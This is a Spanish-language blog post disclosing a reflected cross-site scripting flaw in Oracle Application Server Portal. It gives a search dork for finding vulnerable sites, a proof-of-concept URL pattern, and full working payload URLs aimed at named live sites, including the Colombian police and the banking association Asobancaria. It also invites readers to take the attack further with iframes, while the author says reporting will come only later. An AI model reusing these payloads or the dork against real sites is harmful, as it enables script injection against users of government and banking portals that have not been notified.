Okey, Otravez Yo, estube hablando con @Mono_Ezpacial y Llegamos al punto de poder encontrar una  Vulneabilidad Cross Site scripting En plataforma  Oracle Application Server Portal , Que en colombia la usan portales como:

http://www.policia.gov.co/

http://puj-portal.javeriana.edu.co

https://www.avvillas.com.co/

https://asobancaria.com/

http://www.eea.epson.com/

y muchos bancos mas y el ministerio de Hacienda. y no solo sitios de colombia sino del mundo!

Bueno encontrando la XSS Probe que si en todos eran vulnerables y efectivamente si lo era!

Dork: inurl:/portal/pls/portal/ 

Y Vaya googleando que me lleve otra sorpresa. encontre otro grave XSS pero este en el buscador la cual permitia la ejecuccion de scripts. sitio como

XSS En Panasonic

XSS En Panasonic

XSS En Epson

XSS En Epson

pero esto es muy desviado a todo.. ps esto salio digamos que de ” colateral ” el verdadero xss por cual empeze este post era otro.

PoC: https://sitioconoracle.com/portal/pls/portal/PORTAL.wwpob_home_page_public.popup?popup_name=%XSS%

Ejemplos!

http://oasportal.policia.gov.co/portal/pls/portal/PORTAL.wwpob_home_page_public.popup?popup_name=%22%3E%22%3E%3Cimg%20src=x%20onerror=prompt%28%22xss%22%29;%3E

http://www.asobancaria.com/portal/pls/portal/PORTAL.wwpob_home_page_public.popup?popup_name=%22%3E%22%3E%3Cimg%20src=x%20onerror=prompt%28%22xss/by/dylan/irzi%22%29;%3E

y bueno de resto le queda jugar a ustedes.. quizas con un iframe.. enfin.

Bueno Comunidad. Espero que haya sido de su agrado leerme otra vez. Y bueno posteriormente reportare dichos XSS

Saludos By Dylan Irzi.

Acerca de Mi Dylan Irzi

Colombiano, WebMaster, Independent Security Researcher , Apasionado por la Seguridad Informatica, #WhiteHat. Programador. Co-Fundador y Dueño de WebSecurityDev.com

Noticias Seguridad XSS1 Comment

One thought on “XSS En Oracle Application Server Portal

  1. Pingback: Bitacoras.com

Comments are closed.